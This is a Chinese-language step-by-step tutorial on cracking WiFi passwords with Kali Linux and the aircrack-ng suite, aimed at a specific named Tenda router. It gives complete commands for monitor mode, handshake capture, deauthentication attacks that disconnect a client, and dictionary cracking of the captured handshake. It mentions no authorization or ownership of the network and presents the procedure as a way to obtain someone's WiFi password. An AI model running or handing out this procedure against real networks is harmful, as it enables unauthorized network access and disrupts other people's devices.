使用kali破解WiFi密码_如何用kali获取wifi密码

一、准备工具

1、装有kali系统的电脑

2、USB无线网卡

3、WIFI密码字典

二、准备环境

1、打开kali,将USB网卡插到电脑上，然后接入kali

2、打开一个终端，输入以下命令

airmon-ng 

看一下kali是否连接上网卡

 3、或者使用以下命令查看

ifconfig

有说明网卡与kali连接成功

三、破解步骤

1、结束干扰进程

airmon-ng check kill

 2、开启网卡监听

airmon-ng start wlan0

3、查看网卡名称变化

ifconfig

 网卡名可能会变成wlan0mon，因为这里没有变，后续继续使用wlan0

4、扫描WIFI信号 

airodump-ng wlan0 

扫描出WiFi后，按空格停止扫描 ，然后再按Ｃｔｒｌ＋ｃ退出扫描

BSSID：路由器的MAC地址

CH：信道

ESSID：WIFI的名称 

这里的爆破目标为：Tenda_DAF000

5、抓取握手包 

airodump-ng -w <扫描结果保存的文件名> -c <信道> --bssid <路由器MAC地址> <处于监听模式的网卡名称>

airodump-ng -w kali -c 2 --bssid CC:2D:21:DA:F0:00 wlan0

－ｗ：指定握手包存放的位置，或名称

－ｃ：指定信道 

－－ｂｓｓｉｄ：指定路由器MAC地址

ＢＳＳＩＤ：路由器MAC地址

ＳＴＡＴＩＯＮ：客户端MAC地址

按CTRL+c停止扫描 

6、断开其他与此WiFi的设备连接，抓取握手包

断开其他设备与此WiFi的连接，从而让设备请求再次与路由器握手，得到握手包

打开新的终端输入以下命令：

aireplay-ng -０ <反认证包次数> -a <路由器MAC地址> -c <客户端MAC地址> <处于监听模式的网卡名称>

aireplay-ng -0 2 -a CC:2D:21:DA:F0:00 -c B2:52:2A:6B:DF:16 wlan0

回车后会发出2个包 

7、上传字典

将下载好的字典放到kali的 /root目录下

8、查看获取的握手包

ls

 kali-01.cap为握手包

wifi.txt为密码字典

八、破解握手包

aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

aircrack-ng -w wifi.txt kali-*.cap

-w:指定密码字典

KEY FOUND！后面的为WIFI密码